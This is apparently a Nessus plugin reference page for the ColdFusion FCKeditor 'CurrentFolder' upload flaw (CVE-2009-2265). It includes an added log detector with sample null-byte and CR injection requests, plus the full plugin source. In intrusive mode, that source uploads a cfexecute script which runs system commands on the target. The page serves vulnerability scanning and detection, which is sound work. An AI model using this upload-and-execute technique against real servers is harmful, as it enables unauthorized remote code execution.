Adobe ColdFusion FCKeditor 'CurrentFolder' File Upload - Nessus
Severity: High | Plugin ID: 39790
This page contains detailed information about the Adobe ColdFusion FCKeditor 'CurrentFolder' File Upload Nessus plugin, including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying this vulnerability.
Plugin Overview
ID: 39790
Name: Adobe ColdFusion FCKeditor 'CurrentFolder' File Upload
Filename: coldfusion_fckeditor_file_upload.nasl
Vulnerability Published: 2009-07-03
This Plugin Published: 2009-07-14
Last Modification Time: 2021-02-25
Plugin Version: 1.30
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies: coldfusion_detect.nasl, os_fingerprint.nasl
Required KB Items: installed_sw/ColdFusion
Vulnerability Information
Severity: High
Vulnerability Published: 2009-07-03
Patch Published: 2009-07-08
CVE: CVE-2009-2265
CPE: cpe:/a:adobe:coldfusion
Synopsis
The remote web server contains an application that is affected by an arbitrary file upload vulnerability.
Description
The version of Adobe ColdFusion running on the remote host is affected by an arbitrary file upload vulnerability. The installed version ships with a vulnerable version of an open source HTML text editor, FCKeditor, that fails to properly sanitize input passed to the 'CurrentFolder' parameter of the 'upload.cfm' script located under '/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm'.
An attacker can leverage this issue to upload arbitrary files and execute commands on the remote system subject to the privileges of the web server user id.
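The requests the plugin describes are easy to spot in web server access logs: a hit on the FCKeditor connector's upload.cfm whose CurrentFolder value carries a null byte or carriage return and smuggles a ColdFusion script extension. The following detector is an added example written for this page, not Tenable's code; the log lines it parses are constructed samples in Common Log Format, and the connector path is the one given in the description above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Vulnerable FCKeditor connector, relative to the ColdFusion web root
# (path taken from the plugin description).
CONNECTOR = "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm"

# Extensions ColdFusion executes if they end up in the stored file name.
SCRIPT_EXTS = (".cfm", ".cfml", ".cfc")

# Common Log Format; only the fields the detection needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def classify(target):
    """Return the reasons a request target looks like CurrentFolder abuse
    against upload.cfm (empty list when it does not)."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(CONNECTOR.lower()):
        return []
    # parse_qs percent-decodes once, so %00 becomes "\x00" and %0d "\r".
    qs = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    for folder in qs.get("CurrentFolder", []):
        if "\x00" in folder:
            reasons.append("null byte in CurrentFolder")
        if "\r" in folder or "\n" in folder:
            reasons.append("CR/LF in CurrentFolder")
        # Look at the name left after the injected control byte(s), since
        # that is what the server would write to disk.
        if folder.rstrip("\x00\r\n").lower().endswith(SCRIPT_EXTS):
            reasons.append("script extension in CurrentFolder")
    return reasons

def scan_log(lines):
    """Return (client_ip, status, target, reasons) for every flagged request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (reasons := classify(m["target"])):
            hits.append((m["ip"], m["status"], m["target"], reasons))
    return hits

# Constructed sample traffic: one benign upload, two probes of the connector.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Jul/2009:10:00:01 +0000] "GET /index.cfm HTTP/1.1" 200 512',
    '10.0.0.5 - - [14/Jul/2009:10:00:02 +0000] "GET ' + CONNECTOR + '?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1" 200 301',
    '10.0.0.9 - - [14/Jul/2009:10:00:03 +0000] "GET ' + CONNECTOR + '?Command=FileUpload&Type=File&CurrentFolder=/probe-1247565603.cfm%0d HTTP/1.1" 200 640',
    '10.0.0.9 - - [14/Jul/2009:10:00:04 +0000] "POST ' + CONNECTOR + '?Command=FileUpload&Type=File&CurrentFolder=/probe-1247565604.cfm%00 HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for ip, status, target, reasons in scan_log(SAMPLE_LOG):
        print(ip, status, ", ".join(reasons), target)
```

A 200 response to a flagged request does not by itself prove the upload succeeded; correlate it with a later request for a new .cfm under the FCKeditor upload directory and with the server's own error logs.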
Solution
Upgrade to version 8.0.1 if necessary and apply the patch referenced in the vendor advisory (APSB09-09, linked under References).
Public Exploits
Target Network Port(s): 80, 8500
Target Asset(s): Services/www
Exploit Available: True (Metasploit Framework, Exploit-DB, GitHub, Immunity Canvas, Core Impact)
Exploit Ease: Exploits are available
Here's the list of publicly known exploits and PoCs for verifying the Adobe ColdFusion FCKeditor 'CurrentFolder' File Upload vulnerability:
- Metasploit: exploit/windows/http/coldfusion_fckeditor [ColdFusion 8.0.1 Arbitrary File Upload and Execute]
- Exploit-DB: exploits/cfm/webapps/16788.rb [EDB-16788: ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)]
- Exploit-DB: exploits/cfm/webapps/50057.py [EDB-50057: Adobe ColdFusion 8 - Remote Command Execution (RCE)]
- GitHub: https://github.com/0xkasra/CVE-2009-2265 [CVE-2009-2265: ColdFusion 8.0.1 - Arbitrary File Upload to RCE]
- GitHub: https://github.com/3hydraking/CVE-2009-2265 [CVE-2009-2265]
- GitHub: https://github.com/4n0nym0u5dk/CVE-2009-2265 [CVE-2009-2265]
- GitHub: https://github.com/k4u5h41/CVE-2009-2265 [CVE-2009-2265]
- GitHub: https://github.com/macosta-42/Exploit-Development [CVE-2009-2265]
- GitHub: https://github.com/persian64/CVE-2009-2265 [CVE-2009-2265: ColdFusion 8.0.1 - Arbitrary File Upload to RCE]
- GitHub: https://github.com/0zvxr/CVE-2009-2265 [CVE-2009-2265: Cf8-upload.py | CVE-2009-2265]
- GitHub: https://github.com/zaphoxx/zaphoxx-coldfusion [CVE-2009-2265: Coldfusion exploit based on https://cvedetails.com/cve/CVE-2009-2265/]
- Immunity Canvas: CANVAS
Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered illegal activity.
WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.
Risk Information
CVSS Score Source: CVE-2009-2265
CVSS v2
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:POC/RL:OF/RC:C
Base Score: 10.0 (High)
Impact Subscore: 10.0
Exploitability Subscore: 10.0
Temporal Score: 7.8 (High)
Environmental Score: NA (None)
Modified Impact Subscore: NA
Overall Score: 7.8 (High)
CVSS v3
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Base Score: 8.8 (High)
Impact Subscore: 5.9
Exploitability Subscore: 2.8
Temporal Score: NA (None)
Environmental Score: NA (None)
Modified Impact Subscore: NA
Overall Score: 8.8 (High)
Plugin Source
This is the coldfusion_fckeditor_file_upload.nasl nessus plugin source code. This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(39790);
  script_version("1.30");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/02/25");

  script_cve_id("CVE-2009-2265");
  script_bugtraq_id(31812);
  script_xref(name:"Secunia", value:"35747");
  script_xref(name:"EDB-ID", value:"16788");

  script_name(english:"Adobe ColdFusion FCKeditor 'CurrentFolder' File Upload");
  script_summary(english:"Tries to upload a file with ColdFusion code using FCKeditor.");

  script_set_attribute( attribute:"synopsis", value:
"The remote web server contains an application that is affected by an
arbitrary file upload vulnerability.");
  script_set_attribute( attribute:"description", value:
"The version of Adobe ColdFusion running on the remote host is
affected by an arbitrary file upload vulnerability. The installed
version ships with a vulnerable version of an open source HTML text
editor, FCKeditor, that fails to properly sanitize input passed to
the 'CurrentFolder' parameter of the 'upload.cfm' script located under
'/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm'.

An attacker can leverage this issue to upload arbitrary files and
execute commands on the remote system subject to the privileges of the
web server user id.");
  script_set_attribute(attribute:"see_also", value:"http://ocert.org/advisories/ocert-2009-007.html");
  script_set_attribute(attribute:"see_also",value:"https://www.adobe.com/support/security/bulletins/apsb09-09.html");
  script_set_attribute( attribute:"solution", value:
"Upgrade to version 8.0.1 if necessary and apply the patch referenced
in the vendor advisory above.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2009-2265");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'ColdFusion 8.0.1 Arbitrary File Upload and Execute');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');
  script_cwe_id(22);

  script_set_attribute(attribute:"vuln_publication_date", value:"2009/07/03");
  script_set_attribute(attribute:"patch_publication_date", value:"2009/07/08");
  script_set_attribute(attribute:"plugin_publication_date", value:"2009/07/14");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe",value:"cpe:/a:adobe:coldfusion");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_MIXED_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("coldfusion_detect.nasl", "os_fingerprint.nasl");
  script_require_ports("Services/www", 80, 8500);
  script_require_keys("installed_sw/ColdFusion");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

app = 'ColdFusion';
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80);

install = get_single_install(
  app_name : app,
  port     : port
);
dir = install['path'];
install_url = build_url(port:port, qs:dir);

# key = command, value = arguments
cmds = make_array();
cmd_desc = make_array();
cmd_pats = make_array();

os = get_kb_item("Host/OS");

# decides which commands to run based on OS
# Windows (or unknown)
if (isnull(os) || 'Windows' >< os)
{
  cmds['cmd'] = '/c ipconfig /all';
  cmd_desc['cmd'] = 'ipconfig /all';
  cmd_pats['cmd'] = 'Windows IP Configuration|(Subnet Mask|IP(v(4|6))? Address)[\\. ]*:';
}
# *nix (or unknown)
if (isnull(os) || 'Windows' >!< os)
{
  cmds['sh'] = '-c id';
  cmd_desc['sh'] = 'id';
  cmd_pats['sh'] = 'uid=[0-9]+.*gid=[0-9]+.*';
}

path = "/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm";
folder_name = str_replace(
  find:".nasl",
  replace:"-"+unixtime()+".cfm",
  string:SCRIPT_NAME
);

if(safe_checks())
{
  url =
    path + "/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/" +
    folder_name + "%0d";
  res = http_send_recv3(port:port, method:"GET", item:dir+url, exit_on_fail: TRUE);

  # If it does and is not disabled...
  if (
    "OnUploadCompleted" >< res[2] &&
    "file uploader is disabled" >!< res[2]
  )
  {
    # Try to upload a file.
    bound = "nessus";
    boundary = "--" +bound;
    postdata =
      boundary + '\r\n' +
      # nb: the filename specified here is irrelevant.
      'content-disposition: form-data; name="newfile"; filename="nessus.txt"\r\n'+
      'content-type: text/plain\r\n' +
      '\r\n' +
      '<!-- test script created by ' + SCRIPT_NAME + '. -->\r\n' +
      boundary + "--"+ "\r\n";

    res = http_send_recv3(
      method : "POST",
      port : port,
      item : dir + url,
      data : postdata,
      add_headers : make_array(
        "Content-Type", "multipart/form-data; boundary="+bound),
      exit_on_fail : TRUE
    );

    if(
      "An exception occurred when performing a file operation copy" >< res[2]
      &&
      folder_name + '\\r' >< res[2]
    )
    {
      if (report_verbosity > 1)
      {
        report =
          '\n' +
          'The remote ColdFusion install responded with the following error, while trying to upload a file : ' +
          res[2] + '\n\n' +
          'Note that Nessus reported this issue only based on the error message because \n' +
          'safe checks were enabled for this scan.\n';
        security_hole(port:port, extra:report);
      }
      else security_hole(port);
      exit(0);
    }
  }
}
else
{
  timeout = get_read_timeout();
  http_set_read_timeout(timeout * 2);

  url =
    path + "/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/" +
    folder_name + "%00";
  res = http_send_recv3(port:port, method:"GET", item:dir+url, exit_on_fail: TRUE);

  # If it does and is not disabled...
  if (
    "OnUploadCompleted" >< res[2] &&
    "file uploader is disabled" >!< res[2]
  )
  {
    # Try to upload a file to run a command.
    bound = "nessus";
    boundary = "--" + bound;
    try_again = 0;

    foreach cmd (keys(cmds))
    {
      postdata =
        boundary + '\r\n' +
        # nb: the filename specified here is irrelevant.
        'content-disposition: form-data; name="newfile"; filename="nessus.txt"\r\n' +
        'content-type: text/plain\r\n' +
        '\r\n' +
        # nb: this script executes a command, stores the output in a variable,
        # and returns it to the user.
        '<cfsetting enablecfoutputonly="yes" showdebugoutput="no">\r\n' +
        '\r\n' +
        '<!-- test script created by '+ SCRIPT_NAME + '. -->\r\n' +
        '\r\n' +
        '<cfexecute name="' + cmd + '" arguments="' +cmds[cmd] + '" timeout="'+
        timeout + '" variable="nessus"/>\r\n' +
        '<cfoutput>#nessus#</cfoutput>\r\n' +
        boundary + '--\r\n';

      # Increment 'folder_name' in the URL and in the variable so that each
      # attempt uploads a unique file; otherwise the exploit would try to
      # upload a file that already exists and fail.
      if (try_again > 0)
      {
        orig_url = url;
        orig_folder = folder_name;
        time = unixtime() + try_again;
        url = ereg_replace(pattern:"-([0-9]+)\.cfm", replace:'-'+time+".cfm", string:url);
        folder_name = ereg_replace(pattern:"-([0-9]+)\.cfm", replace:'-'+time+".cfm", string:folder_name);
        # Just in case, revert to original values
        if (empty_or_null(url)) url = orig_url;
        if (empty_or_null(folder_name)) folder_name = orig_folder;
      }

      res = http_send_recv3(
        method : "POST",
        port : port,
        item : dir + url,
        data : postdata,
        add_headers : make_array(
          "Content-Type", "multipart/form-data; boundary="+bound),
        exit_on_fail : TRUE
      );
      attack_req = http_last_sent_request();

      # Figure out the location of the script to request for code execution
      pat = 'OnUploadCompleted\\( *0, *"([^"]+/' + folder_name + ')';
      foreach line (split(res[2], keep:FALSE))
      {
        matches = pregmatch(pattern:pat, string:line);
        if (matches) url2 = matches[1];
      }
      if (isnull(url2)) exit(1, "Nessus was unable to extract the URL for the file uploaded to the "+app+" install at "+install_url);

      # Now try to execute the script.
      res = http_send_recv3(port:port, method:"GET", item:url2, exit_on_fail: TRUE);
      if(egrep(pattern:cmd_pats[cmd], string:res[2]))
      {
        if ("ipconfig" >< cmd_desc[cmd]) line_limit = 10;
        else line_limit = 4;

        security_report_v4(
          port : port,
          severity : SECURITY_HOLE,
          cmd : cmd_desc[cmd],
          line_limit : line_limit,
          request : make_list(attack_req, (install_url - dir)+url2),
          output : chomp(res[2]),
          rep_extra : '\nNote: This file has not been removed by Nessus'+
                      ' and will need to be\nmanually deleted.'
        );
        exit(0);
      }
      try_again++;
    }
  }
}
audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);
The latest version of this script can be found in these locations depending on your platform:
- Linux / Unix:
/opt/nessus/lib/nessus/plugins/coldfusion_fckeditor_file_upload.nasl
- Windows:
C:\ProgramData\Tenable\Nessus\nessus\plugins\coldfusion_fckeditor_file_upload.nasl
- Mac OS X:
/Library/Nessus/run/lib/nessus/plugins/coldfusion_fckeditor_file_upload.nasl
How to Run
Here is how to run the Adobe ColdFusion FCKeditor 'CurrentFolder' File Upload plugin on its own via the Nessus web user interface (https://localhost:8834/):
- Click to start a New Scan.
- Select Advanced Scan.
- Navigate to the Plugins tab.
- On the top right corner click to Disable All plugins.
- On the left side table select CGI abuses plugin family.
- On the right side table select Adobe ColdFusion FCKeditor 'CurrentFolder' File Upload plugin ID 39790.
- Specify the target on the Settings tab and click to Save the scan.
- Run the scan.
Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.
Basic usage:
/opt/nessus/bin/nasl coldfusion_fckeditor_file_upload.nasl -t <IP/HOST>
Run the plugin with audit trail message on the console:
/opt/nessus/bin/nasl -a coldfusion_fckeditor_file_upload.nasl -t <IP/HOST>
Run the plugin with trace script execution written to the console (useful for debugging):
/opt/nessus/bin/nasl -T - coldfusion_fckeditor_file_upload.nasl -t <IP/HOST>
Run the plugin using a state file for the target and updating it (useful for running multiple plugins against the same target):
/opt/nessus/bin/nasl -K /tmp/state coldfusion_fckeditor_file_upload.nasl -t <IP/HOST>
References
BID (SecurityFocus Bugtraq ID): 31812
Secunia Advisory: 35747
CWE (Common Weakness Enumeration):
- CWE-22 (Weakness) Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
- https://www.tenable.com/plugins/nessus/39790
- https://www.adobe.com/support/security/bulletins/apsb09-09.html
- http://ocert.org/advisories/ocert-2009-007.html
- https://vulners.com/nessus/COLDFUSION_FCKEDITOR_FILE_UPLOAD.NASL
- 44701 - Debian DSA-1836-1 : fckeditor - missing input sanitising
- 39806 - FCKeditor 'CurrentFolder' Arbitrary File Upload
- 39862 - Fedora 10 : moin-1.6.4-3.fc10 (2009-7761)
- 39866 - Fedora 10 : wxGTK-2.8.10-2.fc10 / Fedora 11 : moin-1.8.4-2.fc11 (2009-7794)
- 99731 - Adobe ColdFusion BlazeDS Java Object Deserialization RCE
- 66404 - Adobe ColdFusion Multiple Vulnerabilities (APSA13-03)
- 64689 - Adobe ColdFusion Authentication Bypass (APSB13-03)
- 66408 - Adobe ColdFusion Authentication Bypass (APSB13-13) (intrusive check)
- 130263 - Adobe ColdFusion File Upload (APSB18-33) (CVE-2018-15961)
- 48340 - Adobe ColdFusion 'locale' Parameter Directory Traversal
- 42340 - Adobe ColdFusion <= 8.0.1 _logintowizard.cfm XSS
- 66526 - Adobe ColdFusion Multiple Vulnerabilities (APSB13-03) (credentialed check)
- 82780 - Adobe ColdFusion Unspecified XSS (APSB15-07) (credentialed check)
- 93245 - Adobe ColdFusion XML External Entity (XXE) Injection Information Disclosure (APSB16-30)
- 99669 - Adobe ColdFusion 10.x < 10u23 / 11.x < 11u12 / 2016.x < 2016u4 Multiple Vulnerabilities (APSB17-14)
- 103194 - Adobe ColdFusion 11.x < 11u13 / 2016.x < 2016u5 Multiple Vulnerabilities (APSB17-30)
- 109017 - Adobe ColdFusion 11.x < 11u14 / 2016.x < 2016u6 Multiple Vulnerabilities (APSB18-14)
- 117480 - Adobe ColdFusion 11.x < 11u15 / 2016.x < 2016u7 / 2018.x < 2018u1 Multiple Vulnerabilities (APSB18-33)
- 125880 - Adobe ColdFusion < 11.x < 11u19 / 2016.x < 2016u11 / 2018.x < 2018u4 Multiple Vulnerabilities (APSB19-27)
- 148039 - Adobe ColdFusion 2016.x < 2016u17 / 2018.x < 2018u11 / 2021.x < 2021u1 Improper Input Validation RCE (APSB21-16)
- 24278 - ColdFusion Web Server User-Agent HTTP Header Error Message XSS
- 65127 - Adobe InDesign Server RunScript Arbitrary Command Execution
- 41947 - Adobe RoboHelp Server Security Bypass (APSA09-05 / intrusive check)
- 41946 - Adobe RoboHelp Server Security Bypass (APSA09-05)
Version
This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file coldfusion_fckeditor_file_upload.nasl version 1.30. For more plugins, visit the Nessus Plugin Library.